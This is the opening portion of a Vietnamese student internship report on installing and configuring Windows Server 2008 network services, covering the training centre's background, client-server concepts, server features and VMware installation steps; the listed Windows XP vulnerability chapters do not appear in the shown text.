Lê hữu bằng _đồ án cuối kỳ các chính sách win server 2008

Đề tài: Nghiên cứu và triển khai các dịch vụ mạng trên Windows Server 2008
Trang 1
Sinh viên: Lê Hữu Bằng
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG CỘNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAM
VÀ AN NINH MẠNG QUỐC TẾ ATHENA Độc lập - Tự do - Hạnh phúc
----------------------- ----------------
NHIỆM VỤ THỰC HIỆN KHÓA LUẬN
Họ và tên SV: Lê Hữu Bằng MSSV: 12CTCL1
Chuyện ngành: Quản trị mạng
Tên đề tài: Nghiên cứu và triển khai các dịch vụ mạng trên Windows Server 2008
Nội dung thực hiện:
Lý thuyết
Nắm vững các bước thực hiện Quản trị Windows Server 2008
Có khả năng tự thiết lập một máy tính, cấu hình mạng, điều chỉnh khả năng hoạt
động của máy tính, vận hành hệ thống mạng, giải quyết sự cố, các phương pháp bảo
vệ trước nguy cơ virus, worm, trojan, spam.
Thực hành:
Cài đặt Windows Server 2008
Nâng cấp Stand Alone thành Domain Controller
Cài đặt Windows 7
John Domain cho Windows 7
Tạo user account trên AD, thiết lập policy cho phép User được quyền thay đổi ngày
giờ hệ thống.
Backup cho Domain Controller
Quản lý dịch vụ DNS, Mail, DHCP, Web, VPN trên môi trường Local và Internet.
Thực hiện kết nối VPN, Mail Server, Web Server trên máy ảo VPS.
Thời gian thực hiện: 20/03/2015 đến 20/05/2015.
Tp.HCM, Ngày 20 tháng 5 năm 2015
GIÁM ĐỐC TRUNG TÂM GIẢNG VIÊN HƯỚNG DẪN
(Ký, ghi rõ họ tên) (Ký, ghi rõ họ tên)

Trang 2
LỜI CẢM ƠN
Sau một thời gian thực hiện, đề tài nghiên cứu “Nghiên cứu và triển khai các
dịch vụ mạng trên Windowns Server 2008” đã phần nào hoàn thành. Ngoài sự cố
gắng của bản thân em còn nhận được sự giúp đỡ nhiệt tình từ thầy cô, bạn bè, các
anh, chị nơi em thực tập.
Trước hết em xin cảm ơn các thầy cô giáo bộ môn CÔNG NGHỆ THÔNG
TIN TRƯỜNG CAO ĐẲNG NGHỀ LADEC đã giúp đỡ em trong quá trình học
tập. Đặc biệt là thầy PHẠM PHONG PHÚ đã tận tình giúp đỡ em trong suốt quá
trình thực hiện đề tài.
Xin cảm ơn các quý thầy cô tại TRUNG TÂM ĐÀO TẠO QUẢN TRỊ
MẠNG & AN NINH MẠNG QUỐC TẾ ATHENA, đặc biệt là thầy VÕ ĐỖ
THẮNG đã tạo điều kiện cho em được thực tập và học hỏi các kinh nghiệm thực tế
để hoàn thành đề tài này.
Em xin chân thành cảm ơn !

Trang 3
NHẬN XÉT
(của cán bộ hướng dẫn tại công ty thực tập)
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
XÁC NHẬN CỦA CƠ QUAN TP.HCM, ngày… tháng… năm 2015
GIÁM ĐỐC CÁN BỘ HƯỚNG DẪN
(ký tên, đóng dấu) (ký tên)

Trang 4
NHẬN XÉT
(của giảng viên hướng dẫn tại khoa)
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
.......................................................................................................................................
TP.HCM, ngày… tháng… năm 2015
CÁN BỘ HƯỚNG DẪN
(ký tên)

Trang 5
LỜI MỞ ĐẦU
------
Để đáp ứng được những yêu cầu cần thiết từ những công việc trong lĩnh vực
công nghệ thông tin thì việc thường xuyên nghiên cứu, tìm hiểu, phân tích các công
nghệ mới là yếu tố mang tính cấp thiết đối với bất kỳ kỹ sư công nghệ thông tin.
Hiện nay, đa số các hệ thống vẫn còn sử dụng hệ thống mạng hoạt động trong môi
trường domain trên nền Windows Server 2003 hoặc thấp hơn và thời gian sử dụng
của các hệ điều hành này đã đến hoặc quá 10 năm, sắp hết được sự hỗ trợ từ
Microsoft (Windows Server 2000 là điển hình) và nguy cơ bị tấn công từ các lỗ
hổng là rất cao. Nhưng do hoạt động của các hệ thống này còn rất tốt, ổn định nên
quản trị viên rất ngại nâng cấp hệ thống mới do phải bắt đầu cấu hình lại tất cả. Và
các dịch vụ mạng của hệ thống mới có nhiều tiện ích thuận tiện giúp người quản trị
có thể quản lý nhanh và dễ dàng hơn. Để theo kịp thời đại và để hệ thống của mình
có thể được hỗ trợ tốt nhất và tương thích với những sản phẩm mới như SharePoint
2010, SQL 2010, Windows 7… ta cần phải nâng cấp hệ thống sao cho phù hợp.
Để tìm hiểu về quá trình nâng cấp hệ thống từ Windows Server 2003 lên Windows
Server 2008 và một số dịch vụ mạng của Window Server 2008, em xin chọn đề tài:
“Nghiên cứu và triển khai các dịch vụ mạng của hệ thống windows server 2008”

Trang 6
MỤC LỤC
CHƯƠNG 1: LỊCH SỬ HÌNH THÀNH TRUNG TÂM ĐÀO TẠO QUẢN TRỊ
MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA...................................................8
1. Giới thiệu doanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị Mạng và An
Ninh Mạng Quốc Tế ATHENA ........................................................................................8
1.1 Trụ sở chính và chi nhánh ......................................................................................9
1.1.1 Trụ sở chính......................................................................................................9
1.1.2 Cơ sở 2 tại TP Hồ Chí Minh...........................................................................9
1.2 Nhiệm vụ và chức năng hoạt động........................................................................9
1.3 Các sản phẩm .........................................................................................................10
1.3.1 Các khóa học dài hạn: ...................................................................................10
1.3.2 Các khóa học ngắn hạn: ................................................................................10
1.4 Khách hàng.............................................................................................................11
1.5 Đối tác.....................................................................................................................11
1.6 Cơ cấu tổ chức .......................................................................................................12
1.7 Thời gian thực tập .................................................................................................12
CHƯƠNG 2: TỔNG QUAN ÐỀ TÀI............................................................................13
1 Nội dung thực tập..........................................................................................................13
1.1 Nhiệm vụ được giao..............................................................................................13
1.2 Kiến thức tìm hiểu.................................................................................................13
1.2.1 Giới thiệu về mạng doanh nghiệp................................................................13
1.3 Giới thiệu về windows Server 2008....................................................................14
1.3.1 Giới thiệu về mô hình Client-Server ..........................................................14
1.3.2 Giới thiệu về Windows Server 2008 ...........................................................17
CHƯƠNG 3: CÁC BƯỚC THỰC HIỆN ÐỀ TÀI.......................................................21
1 Làm việc với Windows Server 2008 trên môi trường máy ảo VMWare ..............21
1.1 Cài đặt và cấu hình máy chủ Windows Server 2008 ........................................21
1.2 Khởi tạo lần đăng nhập đầu tiên của windows server 2008.............................28
1.3 Cấu hình Domain...................................................................................................43
1.3.1 Mục đích .........................................................................................................43
1.3.2 Mô hình...........................................................................................................43
1.3.3 Các bước thực hiện........................................................................................43
1.4 Cài đặt dịch vụ DNS.............................................................................................60
1.5 Cấu hình DHCP .....................................................................................................77
2 Làm việc với Windows Sever 2008 trên máy chủ ảo VPS......................................92

Trang 7
2.1 Giới thiệu về máy chủ ảo VPS.............................................................................92
2.2 Mail Server.............................................................................................................94
2.3 Cài đặt và cấu hình Web Server trên VPS ...................................................... 109
2.3 Cài đặt và cấu hình Web Server trên VPS ................................................... 109
3 Bảo mật windows....................................................................................................... 125
3.1 Khai thác lỗ hỏng trên Windows XP với mã lỗi MS10_042........................ 125
3.2 Khai thác lỗ hỏng bảo mật Win XP mã lỗi MS12_004................................. 133
3.3 Khai thác lỗ hổng trên Win XP với mã lỗi MS12_027 ................................. 142
4 Các kết quả đạt được ................................................................................................. 149
4.1 Kinh nghiệm thực tế........................................................................................... 149
4.2 Hoàn thiện bản thân ........................................................................................... 149
4.3 Các kiến thức được lĩnh hội.............................................................................. 150
CHƯƠNG 4: KẾT LUẬN............................................................................................. 151
CHƯƠNG 5 : TÀI LIỆU THAM KHẢO ................................................................... 152

Trang 8
CHƯƠNG 1: LỊCH SỬ HÌNH THÀNH TRUNG TÂM ĐÀO TẠO
QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA
1. Giới thiệu doanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị
Mạng và An Ninh Mạng Quốc Tế ATHENA
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA,
tiền thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên
thương hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành
lập theo giấy phép kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ
Chí Minh cấp ngày 04 tháng 11 năm 2008.
Hình 1: Ảnh các cơ sở của trung tâm Athena
Tên giao dịch nước ngoài: ATHENA ADVICE TRAINING NETWORK
SECURITY COMPANY LIMITED.
ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động,
nhiệt huyết và kinh nghiệm trong lĩnh vực công nghệ thông tin. Với quyết tâm góp
phần vào công cuộc thúc đẩy tiến trình tin học hóa của nước nhà.

Trang 9
1.1 Trụ sở chính và chi nhánh
1.1.1 Trụ sở chính
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.
Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam.
Điện thoại: (84-8) 3824 4041.
Hotline: 094 323 00 99.
1.1.2 Cơ sở 2 tại TP Hồ Chí Minh
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA
92 Nguyễn Đình Chiểu, Phường Đa Kao, Quận 1, Tp Hồ Chí Minh,
ViệtNam.
Website: www.Athena.Edu.Vn
Điện thoại: (84-8) 2210 3801.
Hotline: 094 320 00 88.
1.2 Nhiệm vụ và chức năng hoạt động
Trung tâm Athena đã và đang tập trung chủ yếu vào đào tạo chuyên sâu
quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của
các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI, CEH,...Song
song đó, Trung tâm Athena còn có những chương trình đào tạo cao cấp và cung cấp
nhân sự CNTT, quản trị mạng, an ninh mạng chất lượng cao theo đơn đặt hàng của
các đơn vị như Bộ Quốc Phòng, Bộ Công An, ngân hàng, doanh nghiệp, các cơ
quan chính phủ, tổ chức,…
Ngoài chương trình đào tạo, Trung tâm Athena còn có nhiều chương trình
hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành
Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân (Thủ Đức), Học Viện Bưu Chính
Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự,......

Trang 10
1.3 Các sảnphẩm
1.3.1 Các khóa học dài hạn:
- Chương trình đào tạo chuyên gia an ninh mạng, (AN2S) Athena
network security specialist.
- Chương trình Quản trị viên an ninh mạng, (ANST) Athena network
security
- Technician.
- Chuyên viên quản trị mạng nâng cao, (ANMA) Athena network
manager Administrator.
1.3.2 Các khóa học ngắn hạn:
- Khóa Quản trị mạng
- Quản trị mạng Microsoft căn bản ACBN.
- Quản trị hệ thống mạng Microsoft MCSA Security.
- Quản trị mạng Microsoft nâng cao MCSE.
- Quản trị window Vista.
- Quản trị hệ thống Window Server 2008, 2012.
- Lớp Master Exchange Mail Server.
- Quản trị mạng quốc tế Cissco CCNA.
- Quản trị hệ thống mạng Linux 1 và Linux 2.
- Khóa thiết kế web và bảo mật mạng
- Xây dựng, quản trị web thương mại điện tử với Joomla và
VirtuMart.
- Lập trình web với Php và MySQL.
- Bảo mật mạng quốc tế ACNS.
- Hacker mũ trắng.
- Athena Mastering Firewall Security.
- Bảo mật website.
- Các sản phẩm khác

Trang 11
- Chuyên đề thực hành sao lưu và phục hồi dữ liệu.
- Chuyên đề thực hành bảo mật mạng Wi_Fi.
- Chuyên đề Ghost qua mạng.
- Chuyên đề xây dựng và quản trị diễn đàn.
- Chuyên đề bảo mật dữ liệu phòng chống nội gián.
- Chuyên đề quản lý tài sản công nghệ thông tin.
- Chuyên đề kỹ năng thương mại điện tử.
- Các dịch vụ hỗ trợ.
- Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn.
- Giới thiệu việc làm cho mọi học viên.
- Thực tập có lương cho học viên khá giỏi.
- Ngoài giờ học chính thức, học viên được thực hành thêm miễn
phí, không giới hạn thời gian.
- Hỗ trợ thi Chứng chỉ Quốc tế
1.4 Khách hàng
Mọi đối tượng chuyên hoặc không chuyên về CNTT.
Khách hàng chủ yếu của ATHENA là các bạn học sinh, sinh viên và các cán
bộ công nhân viên chức yêu thích lĩnh vực công nghệ thông tin.
1.5 Đối tác
Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung
cấp nhân sự CNTT, quản trị mạng, an ninh mạng chất lượng cao theo đơn đặt
hàng cho các đơn vị ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ
chức tài chính…

Trang 12
1.6 Cơ cấu tổ chức
Hình 1.6 Sơ đồ tổ chức công ty
1.7 Thời gian thực tập
Từ ngày 20/03/2015 đến ngày 20/05/2015

Trang 13
CHƯƠNG 2: TỔNG QUAN ÐỀ TÀI
1 Nội dung thực tập
1.1 Nhiệm vụ được giao
 Nghiên cứu các dịch vụ mạng trên Windows Server 2008
 Triển khai các dịch vụ mạng trên Windows Server 2008
 Xây dựng và quản trị Web bằng mã nguồn mở Wordpress
 Bảo mật windows, xác định các lỗ hổng trên windows
1.2 Kiến thức tìm hiểu
1.2.1 Giới thiệuvề mạng doanh nghiệp
Hệ thống mạng của doanh nghiệp đơn giản hay phức tạp là tùy theo
quy mô và loại hình của doanh nghiệp. Ngày nay, các nhà cung ứng đã đưa
ra rất nhiều sự chọn lựa cho doanh nghiệp như cho phép doanh nghiệp tự
trang bị, tự quản lý hoặc sử dụng dịch vụ. Những doanh nghiệp lớn với hàng
ngàn máy tính cũng có những giải pháp quản lý đặc thù kết hợp cả phần
cứng và phần mềm.
Hầu hết các doanh nghiệp đều có nhu cầu sử dụng các ứng dụng công
nghệ thông tin (CNTT) ở những mức độ khác nhau. Do vậy, họ sẽ có những
nhu cầu khác nhau về quản trị hệ thống mạng (network) của doanh nghiệp.
Một hệ thống được kiểm soát tốt sẽ làm giảm đáng kể chi phí hoạt động,
nâng cao hiệu quả cũng như độ tin cậy của hệ thống.
Các thành phần công nghệ trong mạng doanh nghiệp
Tùy vào qui mô lớn hay nhỏ của doanh nghiệp mà ta sẽ có những giải
pháp công nghệ và thiết kế sao cho phù hợp nhất.
Hiện nay, hầu hết các ứng dụng mới đều yêu cầu rất nhiều tài nguyên
của hệ thống và băng thông mạng, cũng như các yêu cầu về điều khiển, giám
sát mạng. Vậy làm thế nào để một doanh nghiệp vừa và nhỏ, với một số vốn
đầu tư ban đầu hạn chế, có thể tiếp cận được với các công nghệ hiện đại, bắt
kịp sự phát triển của thế giới.

Trang 14
1.3 Giới thiệu về windows Server2008
1.3.1 Giới thiệuvề mô hình Client-Server
Điều đáng ngạc nhiên là nhiều công ty ngày nay vẫn không quan tâm
đến việc thực hiện một mạng lưới client/server. Thay vào đó họ chỉ tiếp tục
thêm vào các máy trạm để thực hiện mô hình mạng peer-to-peer. Mạng peer-
to-peer không cung cấp cho bạn nhiều cách bảo mật và chia sẽ tài nguyên. Vì
vậy, không có gì ngạc nhiên khi họ thường có vấn đề với việc truy cập vào
máy trạm, bị mất dữ liệu do virus, spyware hay phải trải nghiệm việc internet
bị gián đoạn. Máy tính nối mạng theo mô hình peer-to-peer là đủ khi bạn chỉ
có một vài người dung trên mạng, nhưng khi có nhiều hơn 5 hoặc 6 người sử
dụng trên mạng của bạn, bạn thực sự phải xem xét đầu tư một máy chủ
mạng.
Vậy lợi ích của mô hình Client-Server cụ thể là gì?
Tập tin và an ninh mạng: Vai trò quan trọng nhất của một máy chủ
tập tin là an ninh mạng mà nó cung cấp. Bằng cách tạo ra các tài khoản
người dùng cá nhân và nhóm, có thể cấp quyền cho nhóm và cá nhân khai
thác dữ liệu được lưu trữ trên mạng, ngăn chặn người sử dụng trái phép truy
cập tài liệu mà họ không nên xem. Ví dụ, trong Folder chung thì group
ketoan và group nhansu có quyền truy cập ủa nhân viên…

Trang 15
Hình 1.3.1 Cấu hình NTFS Permission
Tăng độ tin cậy, giảm sự gián đoạn công việc: Nhiều máy chủ được
trang bị nguồn điện dự phòng. Với một nguồn cung cấp năng lượng thứ cấp
chạy song song, sự mất mát của một trong những nguồn cung cấp điện không
ảnh hưởng đến hoạt động hệ thống bình thường. Cũng vậy với hệ thống lưu
trữ của máy chủ. Không giống như một máy tính để bàn trung bình có sử
dụng một ổ cứng duy nhất, một máy chủ sẽ thường sử dụng nhiều ổ đĩa cứng
làm việc trong một RAID cấu hình để ngăn ngừa mất dữ liệu hoặc một sự
gián đoạn trong quy trình làm việc. Ngoài ra, nhiều máy chủ cũng được trang
bị ổ đĩa cứng hot swappable và nguồn cung cấp điện. Các thành phần này có
thể thay thế nóng cho phép bạn thay thế phần cứng bị lỗi mà không gián
đoạn toàn bộ văn phòng. Ngoài ra, kể từ khi tất cả các dữ liệu nhân viên đang
được lưu trữ trên mạng, nếu máy trạm của người dùng không giữa ngày làm
việc, nhân viên có thể truy cập các tập tin tương tự từ máy trạm khác.
Tập trung lưu trữ dữ liệu và tài nguyên chia sẻ: Với một máy chủ
mạng, tất cả người dùng trên mạng có thể sử dụng các tài nguyên mạng khác
nhau ngay từ bàn làm việc, tăng hiệu quả. Một số trong những nguồn tài
nguyên bao gồm:

Trang 16
Tập trung lưu trữ dữ liệu ( RAID Array )
Network Attached Storage (NAS) thiết bị
Tháp đĩa CD / DVD
Máy in và máy chủ Fax
Quản lý virus : Một trong những mối đe dọa lớn nhất đối với mạng
của bạn là khả năng lây nhiễm từ virus, phần mềm gián điệp và thư rác. Vì
vậy, có tốt, cập nhật, phần mềm chống virus được cài đặt trên hệ thống của
bạn là một điều cần thiết. Trong một văn phòng của 10 người hoặc ít hơn, hệ
thống có thể được duy trì riêng. Bất cứ điều gì nhiều hơn thế, tuy nhiên, có
thể trở thành một gánh nặng thực sự. Trong những trường hợp này, một gói
phần mềm chống virus kết hợp máy trạm và bảo vệ chống virus máy chủ vào
một giải pháp duy nhất có ý nghĩa hơn.
Sao lưu tập trung: Tất cả các doanh nghiệp nên sao lưu dữ liệu của
họ một cách thường xuyên. Bởi có tất cả các công ty của bạn và dữ liệu nhân
viên được lưu trữ tại một địa điểm, bản sao lưu có thể được thực hiện đáng
tin cậy và nhanh chóng. Vì vậy, bạn sẽ không bao giờ cần phải lo lắng về
những dữ liệu được lưu trữ trên những gì máy trạm như bạn làm trong một
mạng peer-to-peer. Ngày nay, hầu hết các loại phương tiện truyền thông có
thể được sử dụng cho mục đích sao lưu. Ngoài các ổ đĩa truyền thống băng,
đĩa CD, DVD, lưu trữ và thậm chí loại bỏ Network Attached Storage (NAS)
thiết bị này là chấp nhận được. Sự lựa chọn của bạn của phương tiện truyền
thông sẽ phụ thuộc vào yêu cầu cụ thể của bạn sao lưu. Tùy thuộc vào ngân
sách của bạn và nhu cầu lưu giữ dữ liệu của bạn, bất kỳ trong số này sẽ là
một giải pháp chấp nhận được. Hãy chắc chắn rằng bạn có ít nhất một bản
sao lưu hàng tuần theo lịch trình, mặc dù hàng ngày sẽ tốt hơn.

Trang 17
1.3.2 Giới thiệuvề Windows Server 2008
Window Server 2008 là hệ điều hành Windows Server tân tiến nhất
cho tới thời điểm này, được thiết kế nhằm tăng sức mạnh cho các mạng, ứng
dụng và dịch vụ Web thế hệ mới. Với Windows Server 2008, bạn có thể phát
triển, cung cấp và quản lý các trải nghiệm người dùng và ứng dụng phong
phú, đem tới một hạ tầng mạng có tính bảo mật cao, và tăng cường hiệu quả
về mặt công nghệ và giá trị trong phạm vi tổ chức của mình.
Windows Server 2008 kế thừa những thành công và thế mạnh của các
hệ điều hành Windows Server thế hệ trước, đồng thời đem tới tính năng mới
có giá trị và những cải tiến mạnh mẽ cho hệ điều hành cơ sở này. Công cụ
Web mới, công nghệ ảo hóa, tính bảo mật tăng cường và các tiện ích quản lý
giúp tiết kiệm thời gian, giảm bớt các chi phí, và đem tới một nền tảng vững
chắc cho hạ tầng Công nghệ Thông tin (CNTT) của bạn.
Nền tảng chắc chắn dành cho doanh nghiệp
Windows Server 2008 đem tới một nền tảng chắc chắn đáp ứng tất cả
các yêu cầu về ứng dụng và chế độ làm việc cho máy chủ, đồng thời dễ triển
khai và quản lý. Thành phần mới Server Manager cung cấp một console quản
lý hợp nhất, đơn giản hóa và sắp xếp một cách hợp lý việc cài đặt, cấu hình
và quản lý liên tục cho máy chủ. Windows PowerShell, một shell mới kiểu
dòng lệnh, giúp quản trị viên tự động hóa các tác vụ thường trình về quản trị
hệ thống trên nhiều máy chủ. Windows Deployment Services đem tới một
phương tiện bảo mật cao, đơn giản hóa để nhanh chóng triển khai hệ điều
hành này qua các bước cài đặt trên nền mạng.Thêm vào đó, các wizard
Failover Clustering của Windows Server 2008, và việc hỗ trợ đầy đủ cho
Giao thức Internet phiên bản 6 (gọi tắt là IPv6) cộng với khả năng quản lý
hợp nhất Network Load Balancing khiến dễ dàng triển khai với tính sẵn có
cao, thậm chí bởi những người có hiểu biết chung nhất về CNTT.
Tùy chọn cài đặt mới Server Core của Windows Server 2008 cho
phép cài đặt các vai trò máy chủ chỉ với những thành phần và hệ thống phụ

Trang 18
cần thiết mà không cần giao diện người dùng. Việc có ít hơn các vai trò và
đặc tính đồng nghĩa với việc giảm thiểu công việc cho ổ đĩa và dịch vụ, đồng
thời giảm bớt các bề mặt tấn công. Sản phẩm cũng cho phép nhân viên
CNTT xây dựng đặc tả tùy theo các vai trò máy chủ cần hỗ trợ.
Tích hợp Công nghệ Ảo hóa (Virtualization)
Windows Server Hyper-V, công nghệ ảo hóa thế hệ kế tiếp dành cho
máy chủ trên nền hypervisor, cho phép tận dụng tối đa các khoản đầu tư vào
phần cứng máy chủ bằng cách hợp nhất nhiều vai trò máy chủ thành các máy
ảo riêng biệt chạy trên một máy vật lý duy nhất. Cũng có thể chạy song song
nhiều hệ điều hành như Windows, Linux và các hệ điều hành khác một cách
hiệu quả trên một máy chủ duy nhất. Với Hyper – V và các chính sách cấp
phép đơn giản, giờ đây có thể tận dụng lợi thế của các khoản tiết kiệm chi
phí và ảo hóa một cách dễ dàng hơn bao giờ hết.
Hình 1.3.2-1 Mô hình ảo hóa
Nhờ các công nghệ truy cập ứng dụng tập trung của Windows Server
2008, các ứng dụng cũng được ảo hóa một cách hiệu quả. Terminal Services
Gateway và Terminal Services RemoteApp cho phép dễ dàng truy cập từ xa

Trang 19
tới các chương trình chuẩn hoạt động trên nền Windows từ bất cứ vị trí nào
bằng cách chạy chương trình trên một máy chủ đầu cuối thay vì chạy trực
tiếp trên một máy trạm mà không cần tới một mạng riêng ảo (VPN) phức tạp.
Được xây dựng phục vụ Web
Windows Server 2008 xuất hiện với Internet Information Services 7.0
(IIS 7.0), một nền tảng máy chủ Web dễ sử dụng, tăng cường bảo mật để
phát triển và lưu trữ các ứng dụng và dịch vụ Web một cách tin cậy. Đặc tính
nâng cao quan trọng đối với nền tảng Web IIS 7.0 bao gồm một kiến trúc
được thành phần hóa để đem tới khả năng linh hoạt và kiểm soát cao hơn.
II.7.0 cũng cung cấp các khả năng quản lý được đơn giản hóa, khả năng khắc
phục sự cố mạnh mẽ, mang tính chẩn đoán giúp tiết kiệm thời gian và khả
năng mở rộng toàn diện.
Internet Information Server IIS 7.0 cùng với .NET Framework 3.0
cung cấp một nền tảng toàn diện để xây dựng các ứng dụng kết nối người
dùng và dữ liệu, cho phép họ hình ảnh hóa, chia sẻ và thao tác thông tin.
Thêm vào đó, IIS 7.0 còn đóng vai trò trung tâm trong việc hợp nhất các
công nghệ nền tảng Web của Microsoft – ASP.NET, các dịch vụ Web của
Windows Communication Foudation, và Windows Sharepoint Services.
Hình 1.3.2-2 Giao diện Internet Information Services (IIS) Manager

Trang 20
Bảo mật cao
Windows Server 2008 là hệ điều hành Windows Server bảo mật nhất từ
trước đến giờ. Hệ điều hành này đã được củng cố chắc chắn để giúp bảo vệ chống
lại hỏng hóc. Một số công nghệ mới giúp ngăn chặn các kết nối bất hợp pháp tới các
mạng, máy chủ, dữ liệu của bạn và các tài khoản người dùng. Chức năng Network
Access Protection (NAP) giúp đảm bảo rằng những máy tính nào muốn kết nối với
mạng của bạn đều phải tuân thủ chính sách bảo mật của tổ chức. Việc tích hợp công
nghệ và nhiều tính năng nâng cao khiến các dịch vụ Active Directory trở thành một
giải pháp IDA (Identity and Access - Nhận dạng và Truy cập) tích hợp, hợp nhất và
mạnh mẽ. Thêm vào đó, Read-Only Domain Controller (RODC) và Mã hóa ổ đĩa
bằng BitLocker cho phép bạn triển khai cơ sở dữ liệu AD một cách bảo mật hơn
trên khắp các khu vực của văn phòng chi nhánh.
Tính toán hiệu năng cao
Lợi ích và các khoản tiết kiệm chi phí của Windows Server 2008 mở rộng tới
Windows HPC Server 2008 để phục vụ cho môi trường tính toán hiệu năng cao
(HPC) của bạn. Windows HPC Server 2008 được xây dựng trên nền Windows
Server 2008, công nghệ 64 bit và có thể mở rộng một cách hiệu quả tới hàng nghìn
lõi xử lý với tính năng có sẵn để cải thiện hiệu suất, và giảm tính phức tạp của môi
trường HPC. Windows HPC Server 2008 cho phép triển khai rộng rãi hơn bằng
cách đem tới cho người dùng cuối những trải nghiệm phong phú và tích hợp, mở
rộng từ ứng dụng máy bàn tới các cụm máy, và bao gồm một bộ trọn vẹn các công
cụ triển khai, quản trị và giám sát. Các công cụ này dễ triển khai, quản lý và tích
hợp với hạ tầng CNTT hiện có của bạn.

Trang 21
CHƯƠNG 3: CÁC BƯỚC THỰC HIỆN ÐỀ TÀI
1 Làm việc với Windows Server2008 trên môi trường máy ảo
VMWare
1.1 Cài đặt và cấuhình máy chủ Windows Server 2008
Xác định yêu cầu phần cứng:
Hình 1.1 Cấu hình cài đặt Windows Server 2008.
Các bước cài đặt Windows Server 2008 (cài đặt trên môi trường máy
ảo VMware Workstation)
- Mở máy ảo VMware Worksttion
Hình 1.1-1
- Click File & New Vitual Machine

Trang 22
Hình 1.1-2
- Xuất hiện hộp thoại New Vitual Machine Wizard & Click Next.
Hình 1.1-3

Trang 23
- Nếu cài đặt bằng đĩa Window Server 2008 thì chọn Installer disc. Nếu có file
ISO thì click Installer disc image file (iso) và click Browse… & chọn đường dẫn
đến nơi chứa file ISO.
Hình 1.1-4

Trang 24
- Nhập Windows product key hoặc để trống rồi Click Next.
Hình 1.1-5
- Chọn Location nơi Windows Server sẽ cài đặt ổ đĩa. Click Next.

Trang 25
Hình 1.1-6
- Nhập dung lượng ổ đĩa vào ô Maximum disk size khuyến nghị là 40 GB, click
Next.
Hình 1.1-7

Trang 26
- Click Finish để tiến hành cài đặt.
Hình 1.1-8
- Đang trong tiến trình cài đặt
Hình 1.1-9

Trang 27
- Sau khi cài đặt xong, trong lần đăng nhập đầu tiên, hệ thống yêu cầu bạn thay
đổi mật khẩu ngay lập tức
Hình 1.1-10
- Bạn bấm OK, nhập mật khẩu mới và bấm Enter
Hình 1.1.11
Hoàn tất cài đặt Windows Server 2008

Trang 28
1.2 Khởi tạo lần đăng nhập đầu tiên của windows server2008
Ngay khi bạn đăng nhập thành công, hệ thống hiển thị màn hình yêu cầu
thực hiện các thao tác cấu hình ban đầu cho Windows (Initial Configuration Tasks).
Trong đó bao gồm :
- Set time zone: thiết lập time zone cho server.
- Configure networking: thiết lập các thông số kết nối mạng bằng cách
mở cửa sổ Network Connections và tương tác với các kết nối hiện có trên server.
- Provide computer name and domain: mở hộp hội thoại System
Properties để thay đổi tên máy tính và kết nối vào Domain.
- Enable automatic updating and feedback: kích hoạt tính năng này để
cho phép bạn cấu hình Windows automatic updating, Windows Error Reporting và
Customer Experience Improvement Program.
Hình 1.2-1 Màn hình Initial Configuration Task

Trang 29
Hình 1.2-2 Kích hoạt tính năng automatic updating and feedback
Cài đặt Server Manager
Ngay khi kết thúc các bước cấu hình và đóng màn hình Initial
Configuration Tasks, màn hình Server Manager tự động được kích hoạt. Tại đây,
ta có thể thực hiện hầu hết các thao tác cấu hình trên server.
Hình 1.2-3 Màn hình chính của Server Manager
Server Manager là một công cụ cho phép ta thực hiện hầu hết các thao tác
quản trị trên Windows Server 2008, từ các dịch vụ server như Active Directory,

Trang 30
DNS, DHCP, … đến các thành phần của hệ thống như NET Framework 3.0,
